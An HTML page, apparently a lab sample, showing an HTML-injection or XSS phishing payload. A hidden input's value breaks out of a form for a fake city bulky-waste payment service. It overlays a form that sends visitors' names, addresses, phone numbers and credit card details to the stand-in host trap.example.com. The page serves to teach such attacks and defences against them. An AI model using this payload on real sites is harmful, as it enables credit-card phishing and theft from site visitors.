<html>
<head><title>大型垃圾处理需要用信用卡支付</title></head>
<body>
○○市的大型垃圾处理需要用信用卡支付。。
<BR>
<form action="http://example.jp/43/43-002.php" method="POST">
<input name="name" type="hidden" value='"></form><form style=top:5px;left:5px;position:absolute;z-index:99;background-color:white action=http://trap.example.com/43/43-903.php method=POST>大型垃圾处理需要用信用卡支付<br>姓　　名<input size=20 name=name><br>地　　址<input size=20 name=addr><br>电话号码<input size=20 name=tel><br>内　　容<input size=10 name=kind>数　　量<input size=5 name=num><br>信用卡号<input size=16 name=card>信用卡有效期<input size=5 name=thru><br><input value=申请 type=submit><BR><BR><BR><BR><BR></form>'>
<input style="cursor:pointer;text-decoration:underline;color:blue;border:none;background:transparent;font-size:100%;" type="submit" value="○○市大型垃圾处理中心">
</form>
</body>
</html>
